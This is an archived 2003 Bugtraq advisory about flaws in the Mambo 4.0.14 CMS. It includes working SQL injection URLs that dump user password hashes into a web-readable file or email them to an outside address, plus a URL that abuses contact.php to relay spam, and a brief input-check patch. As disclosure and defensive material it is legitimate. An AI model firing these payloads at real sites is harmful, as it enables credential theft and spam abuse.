lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030919043328.10833.qmail@sf-www3-symnsj.securityfocus.com>
Date: 19 Sep 2003 04:33:28 -0000
From: Lifo Fifo <lifofifo20@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Mambo 4.0.14 Stable Bugs




Product : Mambo 4.0.14 Stable
Website : http://www.mamboserver.com/
Status : Vendor notified via email
Imapct : Search for "Mambo Open Source is Free Software released under 
the GNU/GPL License." (with quotes) returned more than 500 results.
Credit : lifofifo

First of all, you will get a bunch of error when you try to open 
banners.php without any arguments. This does reveal some vital information 
like path on the server. This information is very important when using 
"into outfile" feature of MySQL.

Now,

* First Exploit

http://localhost/mambo/banners.php?op=click&bid=100 UNION select 
password from mos_users where 1=1 into outfile 'c:/apache2/htdocs/mos.txt'

Here it's required that magic_quotes_gpc is turned off. And MySQL 4.x 
is running. Because older versions don't support UNION function.

There are other cases of SQL Injection there. But they won't be a 
trouble if you have magic_quotes_gpc turned on. 

* Second Exploit

This one will work in all the cases. No matter 
magic_quotes_gpc/register_globals are on/off. The bug is in "emailfriend/emailarticle.php" 
file. In this file, the variable $id is not checked. Therefore, it is 
possibgle to get the md5() password emailed to you. Check the following,

http://localhost/mambo/emailfriend/emailarticle.php?submit=submit&email=lifofifo20@yahoo.com&youremail=lifofifo20@yahoo.com&id=100 
UNION select username,email,password from mos_users where id=1

In this case, username, md5() hashed password and email address of user 
with id 1 will get deliverd to lifofifo20@...oo.com.

Note : The server needs to using MySQL 4.x

Fix : Add the follwing lines on the top of the 
"emailfriend/emailarticle.php" script.
----
if(!is_numeric($id))
	die("Hacking Attempt");
----

Note : Same patch should also be applied to "emailfriend/emailfaq.php"

* Third Exploit : Anonymous Emailer

In contact.php file, there is a function call like "sendmail($text, 
$from, $name, $email_to, $sitename);". You can pass variables from the 
url. So if you open it like,

http://localhost/mambo/contact.php?op=sendmail&text=this is 
spam&from=none&name=Admin&email_to=lifofifo20@...oo.com&sitename=hackingzone.org

It will send email to lifofifo20@...oo.com from "None".

And this is really enough to give your site a bad name. One can spam 
from YOUR own site. Becase IP of the email sender and IP of your site 
will be same and therefor the integrity of the message won't be a doubt.

This will also work irrespective of magic_quotes_gpc and 
register_globals.

-lifofifo
http://www.hackingzone.org/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ